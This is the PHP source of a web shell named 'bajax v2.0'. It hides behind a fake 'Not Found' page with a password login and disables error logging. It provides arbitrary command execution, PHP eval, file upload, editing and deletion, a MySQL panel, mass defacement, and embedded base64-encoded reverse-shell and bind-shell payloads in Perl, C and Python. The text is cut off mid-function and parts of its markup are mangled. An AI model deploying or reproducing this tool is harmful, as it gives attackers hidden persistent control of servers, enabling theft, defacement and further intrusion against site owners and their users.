session_start();
@set_time_limit(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);


/* Configuration */
/* Password using md5 hashes */
$password = "6a684f2c9a41df2c963a1ee7d17ce2a0"; //mrmad
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = 'UTF-8';
date_default_timezone_set("Asia/Jakarta");
function login_shell()
{

<!DOCTYPE html>
<html lang="en">


<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">




Not Found


<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at =$_SERVER['HTTP_HOST'] Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>


<input type=password name=pass>





exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
login_shell();
}
}

//error_reporting(0);
session_start();
ob_start();
$name="bajax v2.0";
class bajax {
//public $dir;
public $name="bajax v2.0";
public $datasec = array();
public $ctrl_dir = array();
public $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
public $old_offset = 0;
public $find;
public $ip;
public $favicon="iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA21JREFUeNqMVUsotGEUPmNmMBjMYAolhBIi15VQlI0oImShbFz2f3IpysbSksKCXLKQBVlIuRXKdeE25JZbjIzLuJ//nNM/Xxj/7z91mvf7vvd93vM+53neUQGA2dPT0+Ds7Aw2mw3e399BpVIBh4eHBzw+PoLVaoWvERAQAIgIT09P8uzm5gZnZ2fXGhqbMjIy9GVlZZCSkgJqtVpAePLw8LDk4uKibMLv7IuLioogMTERMjMz5VtfXx80NjZquZQrSqOrqyvk5ORAS0sLhIeHy8LU1FRYX18XQCcnJ6U6BuZNb25uoKurS4pob2/nTxb4A4j29PPzw+npaeTY3t7GkpIS/FvU19cjVYgf1l85AHL6+PjgzMyMLNrZ2cG1tTUHsP7+fiwuLkaq/mdATm9vb5yfn8eDgwMMDg7G5eVlBWxjYwOJb7y8vMSlpaX/A+Q0Go1I3CBxhAaDARcWFvDu7g6JaxwfH0dSBE5MTHwClKZ4eXkZAwMDwcXFRSRisViEdA6WBZMeFhYGOp1OxhcXFxAZGQm8hhszNDQE8fHxsLq6apHW3d7eysKQkBBIS0sTjbEG29rapOsvLy9QUVEhG25tbUFVVRVkZ2dDb2+vSCc9PR3o+PD29gaKFljQrC+uUK/XQ2xsLHR2dsom/v7+Ut3h4aFIiisymUxA3MLk5CQUFBSAVqsVHDXlL3KKjpog+jo5OYHT01NxjdlshuPjY6l4c3NT3rNeqetwdHQk4FNTU0Dyko13d3dtirDhm6ipqYGsrCzIzc0F4hkGBwchKChIsRz/UsehtLTUvsSigX8EHyM6OlrGTH5DQwOMjo4C6RQ+UvU1vpVNQkIC0hGxsrIS8/PzlfcxMTFINCianJub+1mH7u7u4pDy8nIknvD19RWrq6s/gRKHAjg7O/sz4MDAAHZ3d8s4Li5OqaapqUmZExUVhdRAXFlZ+TdgXV0djo2NIfEnz0lJSZ88zM6xz42IiMCOjg5Hp3CX+YJl0ukGEQns7+8Lwb6+vpCXl6cQTseXjicnJ0unyZ7Q2toKxKVyfVlpAY6MjCA5Bs/Pz7Gnpwdra2sxNDTUoVmFhYXiaQJDsife39/j3t4eNjc3IznJyhWa6Q6Uv4CHhwepgpoCGo1GPGt/x8GXLPv3+flZ0h48l21JnF7/FmAA22tszHkUqewAAAAASUVORK5CYII=";
public $xback_pl ="dZFfT4MwFMXf+RQVmSvJEuYzqcmCaJZlYwH0xT+EwVUbR0vaLmZx87PblqnEbG/33HPOL7dwfhZspAhWlAUtiLWzkYAyXr2DCh2PS0SQ95zoUW6lgoa4Ninf3NChL9gGvlATfOgl9T/Rb2wQJfNsGUcDFMzccO94Y+JVTa1BqhSvoIg3SW/vHy6f9Kbl4kePjaZlXQtCGaiiVJzhQ8VHux2qKWAXhODikbm+Kduw1BeboaA6bngj1GFOlARXnGimHVZbVjaAh6pqh9qV9vU4S6JZnI/Q8qaYLsxgFkWWp/Fkrum2eZReccag+gN0Jx6N8hYYzvLr6WKE3KuLrtE3krv8hBOn6T+n+/T48AvMIWsuocP3lWb2pQZp+Q0=";
public $xbind_pl ="bZFvS8MwEMbf51PcYre1UKjiy1pxdFXHtnY0VRD/lNneNFiT0maozPnZTYpTEd+F537P5e65vZ63bhvvnguvxqYilmwhAOsu8YnFzqPZLKBdsX2kPuEru6t/wLP3okXubGBH9cNkzhZR2AdvSv2tZsE+GaVnl3AEBw5sAF+5sg8cH7bEmk1YFsX5IkmzwDLQ9f6tT9YtApPFEyr9ed1IJQtZBQ+ouvf9m1g+oz1URT10fNJ2oM3cweI0n8RR5g5YEk5zlqXRaO5++x14f4eSo02xaWRzI6gxozJ+WZsGLJnlxqpbsCRPowsWjcbj1NWzEr16qREDL8uyybmwfw/vTmKD5qP4yvn3o4q3CoXucLgrA9VBvjzyCnUYZEOWRYF6jDCJY5c5XcY926p5Gaxk8+QYpHOFSyGkAiNSMOH2SlxxgSUYWBtljQJYNp7ELj0amH70R0wuMpce/1WjNP2l4isWX+f8b5Wikvo+hjUoV7Dvky3ZfgI=";
public $xback_c = "XVFNawIxEL0L/odhhZJocF2v2oKIBSmtontrZVmTbDd0TSSJxQ/8702y1loPSWbmvXkzvLSEpNWOcRgay4Tqlk/NRuuvdjCxUfSL2ztAcivciYUMgJAWNrmQyAe5/qQEaJlraLv4+32FTzWlYINmw1i9oxa8bM6YzoQEI6QDWM43SqKE9LCnOWl3siLfiOoAjzB6zqZvk/QG2iptHVBaJQ3KrRIojEtW+FbAD+ma8Diy3zrENbe/8tT1kWv1WyBuwYrLK95JOreVi3rBnFhtDbpsRmA5G79ky3QxGb0SmM7ni1k6y9LxHIPrEAUgRJWUnFpUMALozgloY3hwGxPnx5Gr4h7HGA97+LTlWiuNovB8yAgP+F5Y5Ew7Ow93234QDx5es+Rf1vcZ33NaoSheCxmbMiKRv1D9azh000oZ7hp8fP4B";
public $xbind_c = "dVJhS+QwEP0u+B9yFW6Ttex2BT/1erCcCiK3B+oXUSkxSe1gNylJVl0W//tNmha0KrRJ5r2XzMtMDkCLZiMV+eW8BDOrf+/vHbzDLOjHMbh1c79tlfsCd0Y8KT8itPKA/xz0iFDW6pgStCdrDppy+yhSHJ5ZBEOc7++JmlsynQYi30UmpKpkSrR6qSRK0OtGRJhLaUvQxKq18Qo5qGhl7BNlpChIxggeEbmZA11WfA3NlhRkeVaer06v8w9sa6xHrvZGO8q9geDx+XZxz9hHYcg6c93U6xt6vlqenFyWy9VNEEfLSMYy0T5fevXvz0V5dX15uvybZiz6/RHFjLRYJWNp0k13Ogn8A2hJ+wLQ0cXJlP2MrlKSvS668xpwXulhx3GAXmpoFF0wLEVXwYILoVo/aLJoRG7aI9rxn+LFKD4KsXpVoqHJHA3OXZ2kSRho7B7rThCNcSpuCeHb8IWWirrlzvXyB+7wBnGttFdWSda3HnAj9pNCkeUQHmmDlxs0ORwe4uPZdVXswVu4D52f3OkJUu9BxLJJ/qXWfqcNbiuCHfJWrFvaGR2ys/Ak/MZqkgXlfw==";
public $xmulti_py = "lVNda9swFH22wf9B9R4qk9T56PYS0CCMlJYlzWgyGHQjuLZSizqSkZS2+ffVvbKb0GSM5SHWx9E5514dfTrrbY3uPQjZ4/KZ1DtbKhmFYlMrbYkyXWJ28KfyJ267xIoNj8LZ+NdqOrllg/7wcxQurifTKYuR4yEzJbnI4yhc3swmq/nPJbvs96Pwx/xuyWK3fD1f+EHB18SUvKpovimSURQGplyprWXKpLWquaTI24lJ3AFEqnlWVEJyQxMHlg0aqIK10kQQIYnO5COnlTvstxMkbsEd5r/34o9b1dxutSTNnjeU5VYoSXMlJZ58KUXFyVJvOfJYvcNvUDtHDFDOVf5Mm36Ar4C/5ry2DUwLaWnMtVb6t4xxv9UFUsRXxpMHwInlBKcKAsnkYuALQnCHwZovxv3EmgADi0dFHjeoj2Igt8eZ4iPuKnNuWmDrC6nBAjj42m8XA2j//gbbVeyK4bKg0P8ozPTjM3MZSmHgguWpYJIwNgQyzAYs3A9cKWjwAHJ5DAkwRDgd4gnnlPBXYekgaaIGfYdBgoouUq6jTzQ5Y2gf7CC+7/Yh2sznO/Uf2szGV6ub28myTX+6mH/7vlos7ybjWXPOFWrhSbhSaRv45GSRiHYvpKD0vFJ5VpXK2PMuQZNJC6iEse4g2NJbyfy1+RC6OfCcaA7GEj2m0HyeW0qhQwfk/04lVJGaivOafknecwmqrHkUIAA778EA2QDfSjcrCp1gE9MsByX636qD06r4FI/qHo6Iz1m5tYV6kXR45Iw09+M6HseHbshfRD1+T/gG";
public $wmulti_c = "7Vh3WFPZtj8pkEASEiQISDsoCigdRkCDJAICChIBFQtCGhhNMzmhSAsTUEOMxq4ICg6jjgURlSpFcChWHBsKKDrohRvaIBcYUc8NI3e+Ke/73n/vj/fe+r619lm/Vfbae/+x9zphG9UACgAAtJZhGAAqga9EBf57kmnZwLraALiud9+mEhF63yZqK1cCisTCBDGDD7IYAoEQApkcUCwVgFwBGBAeCfKFbI4zgaBvO5ODHggAoQgUYE+zCPtP3h6AiMIhkN4AqFVIWhYBgHrfzISFM9VN48ivdSNm6v+NSmdivpq1BM7opN9x0h8Xoc1HQQD/47SWHu3624foDwUh/7a/PVo/t/8s47f1z/q7H/Wrn/vviyuc8SH/za/Bw9nVa3pyG4IeUp9qnPRJj3lrQx4bAMQGWg/tqdgigPDWOBheq3gnH8AWjTCoQBvcE68m9g5W1BMiSZ4taFu64aw+BGBINqgZTKpBY/R4aIO9qsCRFu2cigD+EH/KllQEutq2YNFoOsYDqNWUP9A1wc8f08W6kS4VYYcT4VfknAbpSsJ1pbGtu4KExznKe1+MZ9SMYAibzW4qfRTo5V++bBxAF62KANMUTXNvKywmJqphA0MLpWXPle9CFir9Sfay/MBq3j0j16tCa3d6vxAGVNACAJ5iDVebViN/go2fMMYAC7Xq+oJ3u8juL6wRLt3CinGyMhBbj/A9YNiQtNRXpSs+MWT5alWNh6X9cmyNSRec/kQ+iSBmw4TZxJwLGLeGT7UvvshvkzfFNKJph6ENvkd1zX0PTX2pei19o7nhq4O9AgX6WhrdX19jqUagIUkkVEq+NSTAqBLL2iv7Yc3pKygz1wm3zv5tRF8cZmlqzZoD2QLQVO3Xv5nV4Yh1aV7n0nmAkNjvH4ZQtnra2WDEDHMc7u41azE2p1OqL+7/og4zHTeFNENqYH/Zz5avjYkBSoIjkNMGuV0GqFbNV1JtI+C50QSqn6Fjre9zn7ez9ezcb7Y1VY4/fDn1WfPPcPz69esiK/fO2rXM69cdyU/GTN0DD1tLaoSKRlVBcn4VZpm/4vWHiyfiJa9bcoxIBL00tEdiqvN8GXpzkIKck+9n9nqH3DduLyKDXBTwitSlaI7fPzoYBurU+bjSVDl9n0uWPnA2Pdygh1/khxow81u0HEnc3xtDBjAiXbNeEh67alfbUcaqAL9whURCHMy5Phg/qDFtuD24G/Kqz+gYzCke7EUr16vv19YS+1YAs1OV/PIFXfEtHiuIFc2Poq99021Bibd8qdw4NBZ/7uXGFy1Pl+anH7XAc5Hn9V3mpCViltqOrEYeLOgruNToPnGfOa64UYq9SsS5xxEzXVXc1kr741dj3ysoQsdt7zqMhrCN/Y+NSHb3DD2Hfl2wSRTc5dnowBe+Hj6uVEWpbtBLrSY+XNh8L3DOF3hP/Up9ZQRe6a5o+VCMaH0Tg70ycBJ95/JZzzTTuc2FhnDgkQPvX+yNOtIahR7mJalD//nlXHqxxjCNX1ll/m07Ym1B4JNoaRelt6kM2dPLRSMMA7xw5+53VO1wvDRaMnE2NXngUYhivDmbsHMzZrD6LDeP088aSrb+51nzYi5/WINhF//AzRsBBpxP28Zeo5lcRlsetr2UttsruMkWRFmYYhal2rDVJASm/h/bN+pG2VNMZyMLCgSnPPWw/c9DiJsPvazvTOpvIao4Y5u2xLY1rhq1bKrlm/D2dNTZnx7+8P2B3isjazfvFPoBxNLd+49NGRYHN50cPZ7dtoRNcoUuHTMYJyRCJIPbskoq25eSUj4See38sCvgCLSC8nx7W5BmkN0I2c1DUp7FqUlwZK6uK5VgNO+YxfVH54Yd50N7lwbk32wPdokuo5xbrP/ldT9nuL90IblFRwzUN4FwCfWBBrEi14pY3tS7D64dyRjK7oRCiuZn7qZ+h1VtQciWjQjrP8+Vmmh0svc4+eeiKPh/+WvMZenPY8u6+U8tiXsCnwc0QO+avTqaK1DfSBCaM64d5++ll2RbLzXDVJppLE6ibtvcrj6Gtewj8amT8iZ5OlZHiv/RwvyF/nUhBZ5vyjwJY1zZapou6G2hlWaOnuRAXTO2PcWWr2l6y7bOz48O/Qa3+FUFrpleoF/g1v4DjvKd24cdtr8SzwQfK5djhEKD8WZEj5yAtzdZxCMm/pSCQ040WsoWGszbnaaLBhBYZHrwBxtS1ls0OH5LmDp5yIEqewdKnZ/Ltvvqpg28f5VomULgJdt4UyH9LKKdcGgNflNMk0zSbGqbl4ADEI/3B3+ulx/LVsSMRUknFc8U6Z8UD6UEZfTW7nKS0kCJH/BraF0V0jOW8g/Yhnf5x+V2iZSu1IuDj8pvOKCTbBf20ozieLS6J25Ug1bErdCYuxBpMdYgyKXNo4M0QN27O+iQ5sgJrF9/7KB+8V3PVk/vz8XR4cu9xkhj3qqbdrB9Ecn1eZdk9G3Po2uvVnZ21lU20Kyc0FkYi6mkqRHHOxkvDXA1szPslb4YibIezoGlVspvbuuNS8kNrbRJepJypOYeVh2rNOrGZ8ZmQ0uyppwkeXW5ivSecjjavAqdjxhRklBG8qbPa4sSanTufLygH7pQ3P1sIuxB+36HjHp5KhYRvrO8qoQVYeKGtyPKK+B9llfWaTys5R9BKBWNhVLrKgajHR7qkrp7IT8jQWT4Tw/w0T56W5S476PfdndGxowgfnFR+khrD5EGrgwNn01e5XBHRVlCrTqhWtt7in1wMFFT50TKtqQgMKM3iIUo7yRjdO7Q4LNHWXeYsDviY1+vpsSgdOP4QbhWDdSfLzqssR/IOG4iZC1d14VX0c9TQWMcKVtFIPW3ycsf8vnJSz9UWo7ZlEzBuTmX62uFF4xUngXEYXi2fAgtf7S9Kb5FOk5st7gz6nebtGpTa1RQc6KfiwJrNjie4Y9QknPcJqUjB1yuHzAnYPNAOjKpuVHOI4JtmqxDoXxv05qL4/COT4o1GY1jcUgkZF/XPn9DA/qEcJmR7KPevLvx5eA5LHhqrn78QDfkM1vRDq0gH+GIUquHd0lJGgqFlN3wEHLuzMgqv4Xw5+lJ+zRziBTvS1mdPH1DS+not7rW0l/KSaNR8yD6uEedrCGHuAdCP5c+cZbvy+uyVUP4R9hlRYgmHAZDF2yYF136slbF+NS0pj/QJb3xh8RUaJwhPZN5p95KL8e/8+cNDz3pYKUujxp88PE10VDL47irIXYxV7JPdx1P83UMTmtf++BTk5t+eJzG4OK43ojPy8GYyVVZj96slC2hnVM8IGKq8fwpuTddOu/KZEmBzubX6kM0Was5cwM6xQZNo4zZ7fsla+BexemqM6U0xfN5SYok68D6qw78OtnCOf9ql0dNZa+J/+7Bq8tgwgCd0lSF889Meno98EILCtfib6q0CF9drmvvGozlVROXvtINLbTqvLEuJkeqczWzv2K+Fep1sOKlzZ19CLOf5G/B9ebGX+SNtD0kn5HhhYkXfMQdTQ7nn+9H7414Dez6dnB5XKlPE0RNFsxDhV4KcLV+sy7XeJl+4AZjb+XbdseT2FDKdyeymlbTNhJpmng1LiW5Q9Pudox+htbS2LnmE3bH/oLM4VKxcVY/Rq4HOJGTNA77z1ZU3yIpXtxTYm/SjeVp72aFtzIw7fcM3FvBrj4ssxe0Cx9jfEIz8ykpox0MgDnAmNSa5KV78rUSX3i9WCvdz1/K1srWw8dvVmoHUL1XNu2zlRc37cPeLDrYg3ePhkwKS1+IkDchkpHhUMN7SRqlk9axDICtzy88CEREhkW2f4HhSCCCwxdCHDCSI07ksjgSMIwhYCTgZV6gqfVC9FyqLup86/xeOGgNgsdlJrC2xUqcd2vj2DweELsyMTaCk8CVQByxP48hkXAkRMdKcv5mL1MjVObU8ClnZxektjuAuHyOi8hByhY6iTnwIDzFE7KcWdbruGJIyuCtkYakgPYMNlvsaN4BD4ILmCgJdydHGG/PdHAIQi5OnFq8h+Xk6YxwcznCMoIrYKILSyiI5ya4cD28F+NSEvhcQYKTZCsD5g8I+WwnNgNiiFxjFoBz/YVSHlvYCY8L7CDQHBJzOYkcUMA4BYrAIP/U1AfV/lHgYhBECflz5eOl9d2OTsuOg76+hbGxXEBZgI91iA1kCyuivewlfDxr69zdw6vZgsmdgJNlaMhy/4lBGN4QFBayOsgpMNgpKiDMzSlyZejKOVHBEU6zycZxY+s93I8V63/LM+oF1shKOUcsqCVx6HjHc6VtFFQAc+Njz7DHvIx9lxrullTx2pl2Qx9ReNYcLei5YHFwNG/anKE+W9d1f7wsrHecFaTLRs1eMG32XEHfyPwtOlmWe9C50zMsr7ikkr2qkZt3dns76lXfyJdOz/tlWI4paO/OGY5iLFqIssHNj4wDfMsCX5DjtN1Y3ElS9BFUSxyKrlOOBE4gzzjqHYfvwmWyNQgam02DhHyav5jDgDh0sbA0aROgJyEGJnMhwlh6xyb8Cq7ALogD6a3mV1ybxSD44/kMq1BWp/WluaRQhgQKFC8RE8K6cc8+C9lSHifYhme9NkmcgfuYuoEYCTG+EYUI4oV8Ie0hGJmSyw/g2rDKKs7WcMUp8ZHSCI4AMv78rNlqrWDrBnbJDyKIKxRcrpp9/QKvxYJM2uyF26Z7QAJ5bUimtRGLMN+HYSfPRfvzhBIO9nO8//GLhuTqcNGuMGxlZqS/LbEUDGizpBnqnCxI94fEvGDxDyabZkvuD2ROjPkamECpqCXvJaKN5eHXfHy/L2uNjU2BXiYtIvO4jgkSAxGy8Vb5M7lHl4AQzxfsFLq85thLYhkiQyhFRNz1Ps/maRx2y/P7eZtEGAemjpdB/YepAWcfBlNox4AwQq4mbxFOL37OwUMsbN2igJNZvF8wHD5LlHI/vnOLhJtwgHeulhyx3ih+32AkLRLc7oDr+faFNxTGKl7NlDS+Zz5kSezwuYJCszMVzm+2mkDMlCaD7oEy2VYBT/cXHvMia3BYI9kqhdjCJD1tj/0Udt2ZEorQ0TbZc79219sFYR+0HTYZRGJIhiSbM6Jr51ypOJNrTRY7It9QRHhR3bUOhwVWVBKG5L7TxppACtbN7yh5s9C5GMJgZ6nPuGxaTL6dR49z7pjY5ZM+jn5iavfjqdoYqmmDs9i+AUFK+Hgg325OHNWZWXXycgwYrqbLHML7X2EPcc3jzidZkOXoRW4PpltVQ0ANAPDvPWpcnbGMCqjqNPtheL0Gp87VXbEHE4TolGKUVvKhT4ad4sHK6Xb9D4 ? hhA6JTMizVm1ElvW5t8j6UmHCrB6uNlo/AEKT48Y/+bX9SpCDtL8Y/JZPfQmZ9Bj7AsPwRQkV2kX/+lEjMRS7XFhUinehnwTCsViLljWgFRt6Clvejk35BPOwP1cJbFBNVcm03Xto3WiI1kfkhpBNKTPytPuytBtKu2w6TiJGLmp9VdUAcACgxeg0QRRmLVmW7Tm8H4gNd3oKFj7K130dyMUHYBqhL8ev64NGStfDRrVpQ645RoORNaM0b+GiyFlCW8LRSm20Ehmum/wHQo7ahI9fDT1W7T2u3SwZmyuLsM6PpUfRpMJqhCrCVbQN8bks/ygdk/ZgsGAb+n/6v0/FCAGAX/hn7XqvL/oKVafU9f8Fqtbq68L/O26rFn2n5vZbHtYwuAoBZRV9t4MzoPDN6zoyrAiNWB4Z6uDsHhIYCtIB1NHrIjMKXJLLEkPP082J9pHvsDAoAoUIGO5TLFDPEKTQA0N4/2quJpb2sxByJBABmnhJaDOKwoN91Gk/70vhdWyHmcLSZpm+y6eDfAoFwEUcw8/TR5o3lCpkAwOQK2P87zvzf";
function header()
{
// favicon
if(isset($_GET['fav'])){
$data=base64_decode($this->favicon);
header("Content-type:image/png");
header("Cache-control:public");
echo $data;
exit;
}
$r='';
$this->name $r.="<!DOCTYPE html><title>$this->name</title>";
$r.='<link rel="SHORTCUT ICON" type="image/png" href="'.$_SERVER['SCRIPT_NAME'].'?fav" />';
$r.="<style type='text/css'>
body {
background:#222;
font-family:Tahoma,Verdana;
color:#fff;
font-size:12px;
}
#wrapper {
border:thin #f00;
margin:10px auto;
padding:20px;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
background:#010107;
}
#head {

border-bottom:thin solid #f00;
padding:7px;
line-height:1.3em;
}
#menu{border-bottom: 1px solid #f00; padding: 5px; text-align: center; margin-bottom:15px;}
#menu a{padding: 7px 10px; color: #fff; font-size: 13px; font-weight:bold;font-family: arial; text-decoration: none; }
#menu a:hover{color: #f00; text-decoration:none;-moz-border-radius:4px;-webkit-border-radius:4px;}
#center{
border:1px solid #f00;
font-size:12px;
padding:10px;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
text-align:center;

}
#center table {
width:100%;
font-size:12px;
margin:0 auto;

}
#center td {
border-bottom:1px solid #f00;
padding:5px;
margin-bottom:10px;
}


#center #input {
border:1px solid #f00;
width:400px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:10px;
}
#center #input:hover {
background-color:#f00;
}
#center #cmd {
width:700px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
}
#center #cmd:hover {
background:#f00;
}
#center #pos {
border-bottom:1px solid #f00;
text-align:center;
padding:5px;
}
#pos textarea {
height:100px;
width:500px;
margin:5px 0 5px 0;
resize:none;
}

#isi {
border:1px solid #f00;
-moz-border-radius:10px;
-webkit-border-radius:10px;
-border-radius:10px;
margin:10px auto;
padding:10px;
color:#fff;
padding-bottom:15px;
line-height:1.5em;

}
#isi textarea {
line-height:1.5em;
border:none;
background:#000;
width:100%;
height:300px;
margin-bottom:10px;
font-size:12px;
color:#fff;
border-bottom:1px solid #f00;
resize:none;
}
#isi input:hover {
color:#f00;
}
#footer {
font-size:12px;
text-align:center;
}
.xpltab {
font-size:11px;
color:#fff;
font-family:Tahoma,Verdana,Arial;


}
.xpltab th {
background-color: #f00;
padding:4px;
opacity:50%;
border-left:thin solid #000;
}
.xpltab th:hover {
color:#fff;
}
.xpltab td {
border-bottom:thin solid #f00;
border-left:thin solid #f00;
padding:5px;
}
a:link,a:active,a:visited {
text-decoration:none;
color:#f00;
}
#box {
border:1px solid #f00;
width:200px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:7px;
margin-right:7px;
}
.tengah {
margin:0 auto;
display:block;
font-size:14px;
}
hr {
line-color:#f00;
}
#but:hover {
background-color: #f00;
}
#but {
height:25px;
background:#222;
color:#fff;
padding:3px;
width:70px;
border-radius:4px;
-moz-border-radius:4px;
-webkit-border-radius:4px;
border:none;
margin-left:7px;
}
#but:active {
position:relative;
top:1px;
}
#col {
margin-left:7px;
float:left;
line-height:2.4em;


}
#val{
margin-left:20px;
float-right;
margin-bottom:7px;
}
#sqlbox {

border:1px solid #f00;
width:1000px;
border:1px solid #f00;
-moz-border-radius:3px;
-webkit-border-radius:3px;
background:#000;
color:#fff;padding:3px;
margin-left:7px;
margin-right:7px;
}
.gede {
font-size:20px;
margin:0 auto;
color:#f00;
}
</style><div id='wrapper'><div id='head'>
".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64."<br />".$_SERVER['SERVER_SOFTWARE']."<br />".get_current_user()."<br />Server Ip : ".gethostbyname($_SERVER['HTTP_HOST'])."<br />Your IP : ".$_SERVER['REMOTE_ADDR']."<br />".$this->drive()."</div>";

return $r;
}
function dir()
{
if(isset($_GET['dir']))
{
$dir =$_GET['dir'];
if(is_dir($dir)){
chdir($dir);
//$dir = $d;
return $dir;

}
}
else {
//return realpath(isset($_GET['dir'])).DIRECTORY_SEPARATOR;
return getcwd().DIRECTORY_SEPARATOR;
}
}
function menu ()
{
//options menu
$r='';
$menu=array("[ Files ]"=>"?act=file&dir=".$this->dir()."", "[ Mysql ]"=>"?act=mysql&dir=".$this->dir()."","Info.Ser"=>"?act=ser&dir=".$this->dir()."", "Encoder"=>"?act=encode&dir=".$this->dir()."", "Back Connect"=>"?act=bc", "Writable Dir"=>"?act=write&dir=".$this->dir()."","BD Scanner"=>"?act=bds&dir=".$this->dir()."","Mass Deface"=>"?act=md&dir=".$this->dir());
$r.="<div id='menu'>";
foreach($menu as $val=>$key)$r.="<a href='$key'>$val</a>";
$r.= "</div>";
return $r;
}
//create new directory
function mkdir()
{
if(!empty($_POST['dir']))
{
if(mkdir($this->replace($this->dir()).$_POST['dir']))
return "created, Refresh Please";else return "Permission Denied";
}
}
function center()
{
$r='';
$r.='<div id="center"><div id="pos">
dir().'">Command
</div><br /><div id="pos">
dir().'">PHP Eval <br /><textarea placeholder="//don\'t include php tag" id="cmd" name="eval"></textarea><br />
</div>
dir().'">
Create Directory :
dir().'">Create File :


<div id="pos">
dir().'" enctype="multipart/form-data">Upload File <p /> Save To dir().'"><br />
</div></div>';
return $r;
}
function execution($r)
{
if(function_exists('system'))
{
ob_start();
system($r);
$s=ob_get_contents();
ob_end_clean();
return $s;
}
elseif(function_exists('passthru'))
{
ob_start();
passthru($r);
$s=ob_get_contents();
ob_clean();
return $s;
}
elseif(function_exists('exec'))
{
$s='';
exec($r,$h);
foreach ($h as $hasil) {
$s.=$hasil;
}
return $s;
}
elseif(function_exists('shell_exec'))
{
$s=shell_exec($r);
return $s;
}
return "All function Disable";
}

//output command
function command()
{
$r='';
$r.='<div id="isi">';
if(!empty($_POST['cmd']))
{
$r.="<pre>".$this->execution($_POST['cmd'])."</pre>";
$r.="</div>";
}
else $r.=header("location:?act=file&dir=".$this->dir());
return $r;
}
function seval($c)
{
ob_start();
eval($c);
$h=ob_get_contents();
ob_end_clean();
return $h;
}
function phpeval()
{
$r='';
$r.='<div id="isi">';
if(isset($_POST['submit'])&&!empty($_POST['eval']))
{
$r.=htmlspecialchars($this->seval($_POST['eval']));
}
else $r.=header("location:?act=file&dir=".$this->dir());
$r.='</div>';
return $r;

}
function upload()
{
if(!empty($_FILES['berkas']))
{
$dest=$this->replace($_POST['tujuan']);
$name=$dest.$_FILES['berkas']['name'];
if(move_uploaded_file($_FILES['berkas']['tmp_name'],$name))
return $this->alert("uploaded");else return $this->alert("failed");
}
}
function createfile()
{
if(!empty($_POST['file']))
if(file_exists($this->replace($this->dir.$_POST['file'])))
return $this->alert("file has exist");
$fp=fopen($this->replace($this->dir.$_POST['file']),"w");
if($fp)
{
fclose($fp);
return $this->alert("file Created");
}
}
function footer()
{
$r='';
$r.="</div></div><div id='footer'>Copy Left Bajax ".date("Y")."</div>";
return $r;

}
function logo()
{
$r='';
$r.="<pre>

barudak jaringan komputer



</pre>
</div>";
return $r;
}
//go up directory
function up($d){
$s=DIRECTORY_SEPARATOR;
$d=explode($s,$d);
array_pop($d);
array_pop($d);
$r=implode($d,$s).DIRECTORY_SEPARATOR;
return $r;
}

function getsize($s)
{
if(!$s) return 0;
if($s>=1073741824) return(round($s/1073741824,2)." GB");
elseif($s>=1048576) return(round($s/1048576,2)." MB");
elseif($s>=1024) return(round($s/1024,2)." KB");
else return($s." B");
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!$this->deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!$this->deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}

function replace($dir)
{
return str_replace('\\','/', $dir);
}
//remove file or folder
function remdir()
{
if(is_writable($_REQUEST['file']))
{
$dir=$_GET['file'];
$this->deleteDirectory($dir);
}
else{echo "Permission Denied !";}
}
function remfile()
{
$file=$_GET['file'];
if(is_file($file)){
unlink($file);
}else{$this->alert("Permission Denied");}
}
function editfile($file)
{
if(!empty($_POST['rename']))
{
rename($_POST['file'],$_POST['rename']);
}
$fp=fopen($_POST['rename'],'w');
if(!$fp)return 0;
fwrite($fp, stripslashes($_POST['isi']));
fclose($fp);return 1;

}
//rename file to new name
function rename($file)
{
if(!empty($_POST['rename']))
{
if(rename($_POST['file'],$_POST['rename']));
return 1;return 0;
}
}

function add_dir($name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec[] = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
